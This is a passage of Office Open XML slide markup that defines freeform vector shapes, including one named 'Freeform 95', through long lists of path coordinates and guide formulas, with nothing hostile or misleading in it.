                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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168" name="Freeform 95"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="294" y="2371"/>
                <a:ext cx="499" cy="209"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1527"/>
                  <a:gd name="T1" fmla="*/ 0 h 638"/>
                  <a:gd name="T2" fmla="*/ 0 w 1527"/>
                  <a:gd name="T3" fmla="*/ 0 h 638"/>
                  <a:gd name="T4" fmla="*/ 0 w 1527"/>
                  <a:gd name="T5" fmla="*/ 0 h 638"/>
                  <a:gd name="T6" fmla="*/ 0 w 1527"/>
                  <a:gd name="T7" fmla="*/ 0 h 638"/>
                  <a:gd name="T8" fmla="*/ 0 w 1527"/>
                  <a:gd name="T9" fmla="*/ 0 h 638"/>
                  <a:gd name="T10" fmla="*/ 0 w 1527"/>
                  <a:gd name="T11" fmla="*/ 0 h 638"/>
                  <a:gd name="T12" fmla="*/ 0 w 1527"/>
                  <a:gd name="T13" fmla="*/ 0 h 638"/>
                  <a:gd name="T14" fmla="*/ 0 w 1527"/>
                  <a:gd name="T15" fmla="*/ 0 h 638"/>
                  <a:gd name="T16" fmla="*/ 0 w 1527"/>
                  <a:gd name="T17" fmla="*/ 0 h 638"/>
                  <a:gd name="T18" fmla="*/ 0 w 1527"/>
                  <a:gd name="T19" fmla="*/ 0 h 638"/>
                  <a:gd name="T20" fmla="*/ 0 w 1527"/>
                  <a:gd name="T21" fmla="*/ 0 h 638"/>
                  <a:gd name="T22" fmla="*/ 0 w 1527"/>
                  <a:gd name="T23" fmla="*/ 0 h 638"/>
                  <a:gd name="T24" fmla="*/ 0 w 1527"/>
                  <a:gd name="T25" fmla="*/ 0 h 638"/>
                  <a:gd name="T26" fmla="*/ 0 w 1527"/>
                  <a:gd name="T27" fmla="*/ 0 h 638"/>
                  <a:gd name="T28" fmla="*/ 0 w 1527"/>
                  <a:gd name="T29" fmla="*/ 0 h 638"/>
                  <a:gd name="T30" fmla="*/ 0 w 1527"/>
                  <a:gd name="T31" fmla="*/ 0 h 638"/>
                  <a:gd name="T32" fmla="*/ 0 w 1527"/>
                  <a:gd name="T33" fmla="*/ 0 h 638"/>
                  <a:gd name="T34" fmla="*/ 0 w 1527"/>
                  <a:gd name="T35" fmla="*/ 0 h 638"/>
                  <a:gd name="T36" fmla="*/ 0 w 1527"/>
                  <a:gd name="T37" fmla="*/ 0 h 638"/>
                  <a:gd name="T38" fmla="*/ 0 w 1527"/>
                  <a:gd name="T39" fmla="*/ 0 h 638"/>
                  <a:gd name="T40" fmla="*/ 0 w 1527"/>
                  <a:gd name="T41" fmla="*/ 0 h 638"/>
                  <a:gd name="T42" fmla="*/ 0 w 1527"/>
                  <a:gd name="T43" fmla="*/ 0 h 638"/>
                  <a:gd name="T44" fmla="*/ 0 w 1527"/>
                  <a:gd name="T45" fmla="*/ 0 h 638"/>
                  <a:gd name="T46" fmla="*/ 0 w 1527"/>
                  <a:gd name="T47" fmla="*/ 0 h 638"/>
                  <a:gd name="T48" fmla="*/ 0 w 1527"/>
                  <a:gd name="T49" fmla="*/ 0 h 638"/>
                  <a:gd name="T50" fmla="*/ 0 w 1527"/>
                  <a:gd name="T51" fmla="*/ 0 h 638"/>
                  <a:gd name="T52" fmla="*/ 0 w 1527"/>
                  <a:gd name="T53" fmla="*/ 0 h 638"/>
                  <a:gd name="T54" fmla="*/ 0 w 1527"/>
                  <a:gd name="T55" fmla="*/ 0 h 638"/>
                  <a:gd name="T56" fmla="*/ 0 w 1527"/>
                  <a:gd name="T57" fmla="*/ 0 h 638"/>
                  <a:gd name="T58" fmla="*/ 0 w 1527"/>
                  <a:gd name="T59" fmla="*/ 0 h 638"/>
                  <a:gd name="T60" fmla="*/ 0 w 1527"/>
                  <a:gd name="T61" fmla="*/ 0 h 638"/>
                  <a:gd name="T62" fmla="*/ 0 w 1527"/>
                  <a:gd name="T63" fmla="*/ 0 h 638"/>
                  <a:gd name="T64" fmla="*/ 0 w 1527"/>
                  <a:gd name="T65" fmla="*/ 0 h 638"/>
                  <a:gd name="T66" fmla="*/ 0 w 1527"/>
                  <a:gd name="T67" fmla="*/ 0 h 638"/>
                  <a:gd name="T68" fmla="*/ 0 w 1527"/>
                  <a:gd name="T69" fmla="*/ 0 h 638"/>
                  <a:gd name="T70" fmla="*/ 0 w 1527"/>
                  <a:gd name="T71" fmla="*/ 0 h 638"/>
                  <a:gd name="T72" fmla="*/ 0 w 1527"/>
                  <a:gd name="T73" fmla="*/ 0 h 638"/>
                  <a:gd name="T74" fmla="*/ 0 w 1527"/>
                  <a:gd name="T75" fmla="*/ 0 h 638"/>
                  <a:gd name="T76" fmla="*/ 0 w 1527"/>
                  <a:gd name="T77" fmla="*/ 0 h 638"/>
                  <a:gd name="T78" fmla="*/ 0 w 1527"/>
                  <a:gd name="T79" fmla="*/ 0 h 638"/>
                  <a:gd name="T80" fmla="*/ 0 w 1527"/>
                  <a:gd name="T81" fmla="*/ 0 h 638"/>
                  <a:gd name="T82" fmla="*/ 0 w 1527"/>
                  <a:gd name="T83" fmla="*/ 0 h 638"/>
                  <a:gd name="T84" fmla="*/ 0 w 1527"/>
                  <a:gd name="T85" fmla="*/ 0 h 638"/>
                  <a:gd name="T86" fmla="*/ 0 w 1527"/>
                  <a:gd name="T87" fmla="*/ 0 h 638"/>
                  <a:gd name="T88" fmla="*/ 0 w 1527"/>
                  <a:gd name="T89" fmla="*/ 0 h 638"/>
                  <a:gd name="T90" fmla="*/ 0 w 1527"/>
                  <a:gd name="T91" fmla="*/ 0 h 638"/>
                  <a:gd name="T92" fmla="*/ 0 w 1527"/>
                  <a:gd name="T93" fmla="*/ 0 h 638"/>
                  <a:gd name="T94" fmla="*/ 0 w 1527"/>
                  <a:gd name="T95" fmla="*/ 0 h 638"/>
                  <a:gd name="T96" fmla="*/ 0 w 1527"/>
                  <a:gd name="T97" fmla="*/ 0 h 638"/>
                  <a:gd name="T98" fmla="*/ 0 w 1527"/>
                  <a:gd name="T99" fmla="*/ 0 h 638"/>
                  <a:gd name="T100" fmla="*/ 0 w 1527"/>
                  <a:gd name="T101" fmla="*/ 0 h 638"/>
                  <a:gd name="T102" fmla="*/ 0 w 1527"/>
                  <a:gd name="T103" fmla="*/ 0 h 638"/>
                  <a:gd name="T104" fmla="*/ 0 w 1527"/>
                  <a:gd name="T105" fmla="*/ 0 h 638"/>
                  <a:gd name="T106" fmla="*/ 0 w 1527"/>
                  <a:gd name="T107" fmla="*/ 0 h 638"/>
                  <a:gd name="T108" fmla="*/ 0 w 1527"/>
                  <a:gd name="T109" fmla="*/ 0 h 638"/>
                  <a:gd name="T110" fmla="*/ 0 w 1527"/>
                  <a:gd name="T111" fmla="*/ 0 h 63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27"/>
                  <a:gd name="T169" fmla="*/ 0 h 638"/>
                  <a:gd name="T170" fmla="*/ 1527 w 1527"/>
                  <a:gd name="T171" fmla="*/ 638 h 63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27" h="638">
                    <a:moveTo>
                      <a:pt x="684" y="295"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="684" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="652" y="348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="633" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="537" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="542" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="549" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="683" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="747" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="767" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="788" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="807" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="828" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="846" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="860" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="872" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="877" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="886" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="896" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="909" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="921" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="932" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="942" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="950" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="956" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="962" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="971" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="983" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="997" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1009" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1021" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
